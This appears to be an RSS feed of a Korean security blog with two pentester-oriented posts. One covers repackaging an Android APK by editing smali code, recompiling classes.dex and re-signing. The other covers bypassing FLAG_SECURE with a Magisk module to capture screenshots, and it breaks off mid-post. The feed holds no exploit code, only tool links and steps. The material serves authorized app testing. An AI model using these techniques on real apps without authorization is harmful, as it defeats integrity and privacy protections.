<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
  <channel>
    <title>Everything is hacked.</title>
    <link>https://kaisec.tistory.com/</link>
    <description>Profile - https://redsec.kaiht.kr</description>
    <language>ko</language>
    <pubDate>Sun, 12 Apr 2026 22:33:16 +0900</pubDate>
    <generator>TISTORY</generator>
    <ttl>100</ttl>
    <managingEditor>Kai_HT</managingEditor>
    <image>
      <title>Everything is hacked.</title>
      <url>https://tistory1.daumcdn.net/tistory/4680984/attach/4c799dad72a64f969c982b5a6793d52a</url>
      <link>https://kaisec.tistory.com</link>
    </image>
    <item>
      <title>App modulation using apktool, smali</title>
      <link>https://kaisec.tistory.com/entry/App-modulation-using-apktool-smali</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;img.gif&quot; data-origin-width=&quot;512&quot; data-origin-height=&quot;288&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/D4Xeh/dJMcajgzOKk/AP1l9QIaeKQz6HGdHn9vQk/img.gif&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/D4Xeh/dJMcajgzOKk/AP1l9QIaeKQz6HGdHn9vQk/img.gif&quot; data-alt=&quot;https://www.android.com&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/D4Xeh/dJMcajgzOKk/AP1l9QIaeKQz6HGdHn9vQk/img.gif&quot; srcset=&quot;https://blog.kakaocdn.net/dn/D4Xeh/dJMcajgzOKk/AP1l9QIaeKQz6HGdHn9vQk/img.gif&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;512&quot; height=&quot;288&quot; data-filename=&quot;img.gif&quot; data-origin-width=&quot;512&quot; data-origin-height=&quot;288&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;https://www.android.com&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;취약점 점검 항목 중 전자금융 관련 항목으로 앱 로직 임의 변조 항목이 주로 취약점으로 잡히곤 한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;본 취약점 항목 점검을 위해 일반적으로 APKEasyTool 을 사용하여 디컴파일을 수행하고 smali 코드 변조 이후, 리컴파일을 수행하는데 안드로이드 보안 정책으로 인하여 apk 리컴파일 수행 시, APKEasyTool 만으로 정상 수행되지 않을 때가 있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 문제 해결을 위해 본인의 경우&amp;nbsp;&lt;b&gt;변조 및 로직이 변경된 Smali 코드가 포함된 class 파일만을 리컴파일하여 apk 패키지 내 직접 덮어씌워&amp;nbsp;&lt;/b&gt;적용시키는 방법을 애용한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 방법 이용을 위해 수동으로 class 파일에 대한 리컴파일 및 서명이 요구되므로 추가 툴이 필요하다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 리컴파일 툴: &lt;a href=&quot;https://repo1.maven.org/maven2/org/smali/smali/2.5.2/smali-2.5.2.jar&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://repo1.maven.org/maven2/org/smali/smali/2.5.2/smali-2.5.2.jar&lt;/a&gt;&lt;br /&gt;- apk signer: &lt;a href=&quot;https://github.com/patrickfav/uber-apk-signer/releases/download/v1.3.0/uber-apk-signer-1.3.0.jar&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://github.com/patrickfav/uber-apk-signer/releases/download/v1.3.0/uber-apk-signer-1.3.0.jar&lt;/a&gt;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style8&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 툴에 대한 디컴파일 수행 (디컴파일은 APK Easy Tool 을 사용해도 문제 없다.) 이후, 변조할 구간 Smali 코드에서 Toast Message 구간을 추가한다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;990&quot; data-origin-height=&quot;696&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/JzIpC/dJMcagYuf68/iDopKUOnYCOCi5zYsptPck/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/JzIpC/dJMcagYuf68/iDopKUOnYCOCi5zYsptPck/img.png&quot; data-alt=&quot;Class 파일 내 smali 코드 변조&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/JzIpC/dJMcagYuf68/iDopKUOnYCOCi5zYsptPck/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FJzIpC%2FdJMcagYuf68%2FiDopKUOnYCOCi5zYsptPck%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;990&quot; height=&quot;696&quot; data-origin-width=&quot;990&quot; data-origin-height=&quot;696&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;Class 파일 내 smali 코드 변조&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;smali 코드 변조 이후, smali.jar 파일을 이용하여 변조한 Smali 코드가 포함된 class 를 리컴파을 수행해준다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;952&quot; data-origin-height=&quot;704&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bwv0sw/dJMcahb13fd/wAMRouiOHsLkQeVV30Kk70/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bwv0sw/dJMcahb13fd/wAMRouiOHsLkQeVV30Kk70/img.png&quot; data-alt=&quot;smali.jar 을 이용한 classes.dex 리컴파일 수행&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bwv0sw/dJMcahb13fd/wAMRouiOHsLkQeVV30Kk70/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbwv0sw%2FdJMcahb13fd%2FwAMRouiOHsLkQeVV30Kk70%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;952&quot; height=&quot;704&quot; data-origin-width=&quot;952&quot; data-origin-height=&quot;704&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;smali.jar 을 이용한 classes.dex 리컴파일 수행&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 classes.dex 파일 리컴파일 수행 이후, 기존 apk 파일을 반디집 등의 압축 관리 프로그램으로 열어 리컴파일된 classes.dex 파일을 덮어씌워준다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;990&quot; data-origin-height=&quot;748&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b2FPJs/dJMcac2POsC/VSPR3JomKUS4BTvAejfKkK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b2FPJs/dJMcac2POsC/VSPR3JomKUS4BTvAejfKkK/img.png&quot; data-alt=&quot;리컴파일된 classes.dex 파일 덮어씌우기&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b2FPJs/dJMcac2POsC/VSPR3JomKUS4BTvAejfKkK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb2FPJs%2FdJMcac2POsC%2FVSPR3JomKUS4BTvAejfKkK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;990&quot; height=&quot;748&quot; data-origin-width=&quot;990&quot; data-origin-height=&quot;748&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;리컴파일된 classes.dex 파일 덮어씌우기&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 앱에 대한 패칭이 끝났으므로 리사이닝만 수행하면 해당 앱 변조가 끝난다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;952&quot; data-origin-height=&quot;704&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/yn6ga/dJMcabiA6wi/CyoFBLuEMJAS97QNvbGcc0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/yn6ga/dJMcabiA6wi/CyoFBLuEMJAS97QNvbGcc0/img.png&quot; data-alt=&quot;uber-apk-signer.jar 을 이용한 apk 파일 리사이닝&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/yn6ga/dJMcabiA6wi/CyoFBLuEMJAS97QNvbGcc0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fyn6ga%2FdJMcabiA6wi%2FCyoFBLuEMJAS97QNvbGcc0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;952&quot; height=&quot;704&quot; data-origin-width=&quot;952&quot; data-origin-height=&quot;704&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;uber-apk-signer.jar 을 이용한 apk 파일 리사이닝&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 Signning 을 수행하고 나면, 화면 내 'VERIFY' 로그에서 확인할 수 있듯이 '[&lt;i&gt;appName&lt;/i&gt;-aligned-debugsigned.apk] 이라는 이름의 apk 파일 획득이 가능하다. 해당 파일을 디바이스 내 설치 이후 해당 로직이 동작하면 취약, 아니면 양호로 판단하면 되겠다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;자동화 툴:&lt;/p&gt;
&lt;figure id=&quot;og_1767855557744&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;object&quot; data-og-title=&quot;GitHub - KaiHT-Ladiant/Android-Patched-Repackging-For-Pentester: apk file Repackaging for pentester&quot; data-og-description=&quot;apk file Repackaging for pentester. Contribute to KaiHT-Ladiant/Android-Patched-Repackging-For-Pentester development by creating an account on GitHub.&quot; data-og-host=&quot;github.com&quot; data-og-source-url=&quot;https://github.com/KaiHT-Ladiant/Android-Patched-Repackging-For-Pentester&quot; data-og-url=&quot;https://github.com/KaiHT-Ladiant/Android-Patched-Repackging-For-Pentester&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/cpcU1l/hyZQ9i6bsJ/MWpaBqTmq2KYNCqyzvBusk/img.png?width=1200&amp;amp;height=600&amp;amp;face=0_0_1200_600,https://scrap.kakaocdn.net/dn/d8ty4q/hyZQ07vhMU/rQ8ELKuoOZHVy6Z0HKkBo1/img.png?width=1200&amp;amp;height=600&amp;amp;face=0_0_1200_600&quot;&gt;&lt;a href=&quot;https://github.com/KaiHT-Ladiant/Android-Patched-Repackging-For-Pentester&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://github.com/KaiHT-Ladiant/Android-Patched-Repackging-For-Pentester&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/cpcU1l/hyZQ9i6bsJ/MWpaBqTmq2KYNCqyzvBusk/img.png?width=1200&amp;amp;height=600&amp;amp;face=0_0_1200_600,https://scrap.kakaocdn.net/dn/d8ty4q/hyZQ07vhMU/rQ8ELKuoOZHVy6Z0HKkBo1/img.png?width=1200&amp;amp;height=600&amp;amp;face=0_0_1200_600');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;GitHub - KaiHT-Ladiant/Android-Patched-Repackging-For-Pentester: apk file Repackaging for pentester&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;apk file Repackaging for pentester. Contribute to KaiHT-Ladiant/Android-Patched-Repackging-For-Pentester development by creating an account on GitHub.&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;github.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>Tools/Android</category>
      <category>android apk recompile resignning</category>
      <category>apk easy tool 리컴파일 문제</category>
      <category>apk easy tool 리컴파일 오류</category>
      <category>apk easytool recompile error</category>
      <category>apk easytool recompile error solved</category>
      <category>apk recompile error</category>
      <category>apk recompile error solved</category>
      <category>apk 리컴파일 오류</category>
      <author>Kai_HT</author>
      <guid isPermaLink="true">https://kaisec.tistory.com/85</guid>
      <comments>https://kaisec.tistory.com/entry/App-modulation-using-apktool-smali#entry85comment</comments>
      <pubDate>Thu, 8 Jan 2026 02:02:03 +0900</pubDate>
    </item>
    <item>
      <title>UnActivity FLAG_SECURE in Application</title>
      <link>https://kaisec.tistory.com/entry/UnActivity-FLAGSECURE-in-Application</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;1244&quot; data-origin-height=&quot;933&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/eSVZfh/dJMcahC55uh/A89osxkSXfYwRjodCYujgk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/eSVZfh/dJMcahC55uh/A89osxkSXfYwRjodCYujgk/img.png&quot; data-alt=&quot;https://medium.com/@contact2kalshetty/how-to-prevent-screenshots-screen-recording-in-android-real-code-interview-q-a-7a196784e29e&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/eSVZfh/dJMcahC55uh/A89osxkSXfYwRjodCYujgk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FeSVZfh%2FdJMcahC55uh%2FA89osxkSXfYwRjodCYujgk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1244&quot; height=&quot;933&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;1244&quot; data-origin-height=&quot;933&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;https://medium.com/@contact2kalshetty/how-to-prevent-screenshots-screen-recording-in-android-real-code-interview-q-a-7a196784e29e&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;안드로이드 내 앱 진단 수행하다보면 앱 내 FLAG_SECURE 보안 플래그로 인하여 미러링 화면에서 화면이 출력되지 않아 증적을 찍기 힘든 경우가 있다. 이럴 때 보고서 작성 등 화면 이미지를 사용할 때 불편하여 증적저장하기 위해 방법을 찾게 되었다.&lt;/p&gt;
&lt;div data-ke-type=&quot;moreLess&quot; data-text-more=&quot;더보기&quot; data-text-less=&quot;닫기&quot;&gt;&lt;a class=&quot;btn-toggle-moreless&quot;&gt;더보기&lt;/a&gt;
&lt;div class=&quot;moreless-content&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;안드로이드 리커버리 모드에서 스크린 샷하는 글&lt;/p&gt;
&lt;figure id=&quot;og_1767776339406&quot; style=&quot;color: #333333; text-align: start;&quot; contenteditable=&quot;false&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/ZKzhM/hyZRdeBwpm/1oNpwdMnI5iPP8aOP3kKA1/img.png?width=601&amp;amp;height=451&amp;amp;face=0_0_601_451,https://scrap.kakaocdn.net/dn/f2NyY/hyZPPyl5pI/bqwgDXmkCu9D5XNUL4cNuk/img.png?width=601&amp;amp;height=451&amp;amp;face=0_0_601_451,https://scrap.kakaocdn.net/dn/EHN3s/hyZQZACip9/82T42Nt8lKwjX1kw2sD7ok/img.png?width=1440&amp;amp;height=2560&amp;amp;face=0_0_1440_2560&quot; data-og-url=&quot;https://tistory.kaiht.kr/entry/Unlock-Android-With-TWRP&quot; data-og-source-url=&quot;https://kaisec.tistory.com/entry/Unlock-Android-With-TWRP&quot; data-og-host=&quot;tistory.kaiht.kr&quot; data-og-description=&quot;안드로이드의 커스텀 펌웨어 업데이트 이후 디바이스를 확인해보면 시스템 문제인지 기존 잠금 데이터로 잠금해제가 되지 않는 경우가 존재했다. 때문에 디바이스 내 접근을 위한 방법이 필요&quot; data-og-title=&quot;Unlock Android Screen With TWRP&quot; data-og-type=&quot;article&quot; data-ke-align=&quot;alignCenter&quot; data-ke-type=&quot;opengraph&quot;&gt;&lt;a style=&quot;color: #000000;&quot; href=&quot;https://kaisec.tistory.com/entry/Unlock-Android-With-TWRP&quot; data-source-url=&quot;https://kaisec.tistory.com/entry/Unlock-Android-With-TWRP&quot;&gt;&lt;br /&gt;
&lt;div&gt;&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;p style=&quot;color: #000000;&quot; data-ke-size=&quot;size16&quot;&gt;Unlock Android Screen With TWRP&lt;/p&gt;
&lt;p style=&quot;color: #909090;&quot; data-ke-size=&quot;size16&quot;&gt;안드로이드의 커스텀 펌웨어 업데이트 이후 디바이스를 확인해보면 시스템 문제인지 기존 잠금 데이터로 잠금해제가 되지 않는 경우가 존재했다. 때문에 디바이스 내 접근을 위한 방법이 필요&lt;/p&gt;
&lt;p style=&quot;color: #909090;&quot; data-ke-size=&quot;size16&quot;&gt;tistory.kaiht.kr&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;방법 중에 가장 편한 것이 루팅에 이용되는 &lt;span style=&quot;color: #eb5757;&quot; data-token-index=&quot;1&quot;&gt;Magisk&lt;/span&gt;모듈을 사용하는 방법이다.&amp;nbsp;&lt;span style=&quot;color: #eb5757;&quot; data-token-index=&quot;3&quot;&gt;Xposed-Disable-FLAGE_SECURE&lt;/span&gt;모듈이나&amp;nbsp;&lt;span style=&quot;color: #eb5757;&quot; data-token-index=&quot;5&quot;&gt;Enable Screenshot&amp;nbsp;&lt;/span&gt;모듈이 있다고 하는데,&amp;nbsp;&lt;span style=&quot;color: #eb5757;&quot; data-token-index=&quot;7&quot;&gt;Disable Flag Secure&lt;/span&gt; 모듈이 있으면&amp;nbsp;&lt;span style=&quot;color: #eb5757;&quot; data-token-index=&quot;9&quot;&gt;Xposed&lt;/span&gt; 없이도 시스템 전체에 대한&amp;nbsp;&lt;span style=&quot;color: #eb5757;&quot; data-token-index=&quot;11&quot;&gt;FLAG_SECURE&lt;/span&gt;&amp;nbsp;옵션 비활성화가 가능하다.&lt;/p&gt;
&lt;figure id=&quot;og_1767776415638&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;Disable Flag Secure v10 Magisk Module&quot; data-og-description=&quot;Unlock screenshots &amp;amp; screen recordings in secure apps with Disable Flag Secure Magisk Module! Bypass FLAG_SECURE restrictions on any rooted Android.&quot; data-og-host=&quot;www.magiskmodule.com&quot; data-og-source-url=&quot;https://www.magiskmodule.com/disable-flag-secure/&quot; data-og-url=&quot;https://www.magiskmodule.com/disable-flag-secure/&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/b2U37x/hyZQO5D7KR/pBB4OX9HtoP64fLKKyR8S1/img.jpg?width=1200&amp;amp;height=675&amp;amp;face=0_0_1200_675,https://scrap.kakaocdn.net/dn/bxS707/hyZQStrfa0/WkQeEQYukwJieGDGK4Vny0/img.jpg?width=1200&amp;amp;height=675&amp;amp;face=0_0_1200_675&quot;&gt;&lt;a href=&quot;https://www.magiskmodule.com/disable-flag-secure/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://www.magiskmodule.com/disable-flag-secure/&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/b2U37x/hyZQO5D7KR/pBB4OX9HtoP64fLKKyR8S1/img.jpg?width=1200&amp;amp;height=675&amp;amp;face=0_0_1200_675,https://scrap.kakaocdn.net/dn/bxS707/hyZQStrfa0/WkQeEQYukwJieGDGK4Vny0/img.jpg?width=1200&amp;amp;height=675&amp;amp;face=0_0_1200_675');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;Disable Flag Secure v10 Magisk Module&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;Unlock screenshots &amp;amp; screen recordings in secure apps with Disable Flag Secure Magisk Module! Bypass FLAG_SECURE restrictions on any rooted Android.&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.magiskmodule.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p&gt;&lt;figure class=&quot;fileblock&quot; data-ke-align=&quot;alignCenter&quot;&gt;&lt;a href=&quot;https://blog.kakaocdn.net/dn/FbU0e/dJMcaf6moyr/h6Wqr31f2EpU3Lq9xpFUL1/?attach=1&amp;amp;knm=tfile.zip&quot; class=&quot;&quot;&gt;
    &lt;div class=&quot;image&quot;&gt;&lt;/div&gt;
    &lt;div class=&quot;desc&quot;&gt;&lt;div class=&quot;filename&quot;&gt;&lt;span class=&quot;name&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;size&quot;&gt;다운로드&lt;/div&gt;
&lt;/div&gt;
  &lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style8&quot; /&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 50%;&quot;&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;528&quot; data-origin-height=&quot;938&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/crjJSZ/dJMcai21ZVX/ekX8dh5I9G4hpJ1zZMj5rK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/crjJSZ/dJMcai21ZVX/ekX8dh5I9G4hpJ1zZMj5rK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/crjJSZ/dJMcai21ZVX/ekX8dh5I9G4hpJ1zZMj5rK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcrjJSZ%2FdJMcai21ZVX%2FekX8dh5I9G4hpJ1zZMj5rK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;528&quot; height=&quot;938&quot; data-origin-width=&quot;528&quot; data-origin-height=&quot;938&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/td&gt;
&lt;td style=&quot;width: 50%;&quot;&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;528&quot; data-origin-height=&quot;938&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bqoMBC/dJMcah4aYta/6mFg2o4O7ThLk6pAI8rjuk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bqoMBC/dJMcah4aYta/6mFg2o4O7ThLk6pAI8rjuk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bqoMBC/dJMcah4aYta/6mFg2o4O7ThLk6pAI8rjuk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbqoMBC%2FdJMcah4aYta%2F6mFg2o4O7ThLk6pAI8rjuk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;528&quot; height=&quot;938&quot; data-origin-width=&quot;528&quot; data-origin-height=&quot;938&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;우선 Magisk 모듈 항목에서 저장소 내 파일 호출한다. (위 해당 첨부파일은 당연히 디바이스 내 저장되어 있어야한다.)&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 50%;&quot;&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;528&quot; data-origin-height=&quot;938&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/OdI2y/dJMcaivcFE2/Q8XfLNSkH7ak4N5tcwb3L0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/OdI2y/dJMcaivcFE2/Q8XfLNSkH7ak4N5tcwb3L0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/OdI2y/dJMcaivcFE2/Q8XfLNSkH7ak4N5tcwb3L0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FOdI2y%2FdJMcaivcFE2%2FQ8XfLNSkH7ak4N5tcwb3L0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;528&quot; height=&quot;938&quot; data-origin-width=&quot;528&quot; data-origin-height=&quot;938&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/td&gt;
&lt;td style=&quot;width: 50%;&quot;&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;528&quot; data-origin-height=&quot;938&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/xA5T9/dJMcafeeskw/uKkagy7F9TK76rBQ0H3SY1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/xA5T9/dJMcafeeskw/uKkagy7F9TK76rBQ0H3SY1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/xA5T9/dJMcafeeskw/uKkagy7F9TK76rBQ0H3SY1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FxA5T9%2FdJMcafeeskw%2FuKkagy7F9TK76rBQ0H3SY1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;528&quot; height=&quot;938&quot; data-origin-width=&quot;528&quot; data-origin-height=&quot;938&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
